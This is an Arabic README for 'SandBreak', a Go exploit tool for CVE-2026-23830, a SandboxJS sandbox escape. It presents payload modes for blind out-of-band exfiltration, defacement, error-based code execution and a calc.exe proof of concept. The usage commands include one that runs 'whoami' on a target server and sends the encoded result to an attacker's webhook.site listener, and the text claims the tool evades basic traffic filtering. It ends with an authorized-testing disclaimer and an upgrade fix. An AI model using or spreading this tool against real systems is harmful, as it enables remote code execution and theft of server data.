
يولّد ويوزّع حمولات استغلال لثغرة CVE-2026-23830، وهي هروب من بيئة SandboxJS، مع أوضاع لاستخراج البيانات خارج النطاق (OOB) بشكل أعمى وإثبات مفهوم محلي (calc PoC). يدعم مستمعي HTTP/HTTPS وينتج حمولات JavaScript مصغّرة.
SandBreak هي أداة قوية مبنية بلغة Go، مصممة لاستغلال ثغرة الهروب من صندوق الرمل SandboxJS (CVE-2026-23830).
تستغل هذه الأداة مُنشئ AsyncFunction غير المحمي في الإصدارات الأقدم من sandboxjs، مما يسمح للمهاجمين بكسر بيئة صندوق الرمل V8 وتنفيذ أكواد عشوائية على النظام المضيف. تدعم الأداة أوضاع حمولات متعددة تشمل استخراج البيانات خارج النطاق (Blind OOB Exfiltration)، تشويه الصفحات (Defacement)، وتنفيذ الأوامر عبر الأخطاء (Error-Based RCE).
oob: استخراج البيانات خارج النطاق (HTTP/HTTPS) للسيناريوهات العمياء.calc: تشغيل calc.exe (إثبات مفهوم كلاسيكي).استنسخ المستودع ثم نفّذ:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
استخدم هذا الوضع عندما لا تتوفر لديك أي تغذية راجعة للمخرجات. ينفّذ الأمر ويرسل النتيجة المشفّرة بـ Base64 إلى المستمع الخاص بك (مثل webhook.site).
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
يتجاوز بنجاح أعطال تصفية حركة المرور الأساسية من خلال معالجة أخطاء الشبكة.
يشغّل الآلة الحاسبة على خادم Windows.
go run CVE-2026-23830.go -mode calc
المهاجم يستلم بيانات المستخدم الخاصة بالخادم عبر Webhook على الرغم من عدم وجود أي مخرجات مرئية على الموقع.
تم إنشاء هذه الأداة لأغراض تعليمية واختبار الاختراق المصرّح به فقط.
قم بترقية sandboxjs إلى أحدث إصدار حيث يتم عزل مُنشئ AsyncFunction بشكل صحيح.
npm update sandboxjs
المؤلف: Meysam Bal-afkan
الترخيص: MIT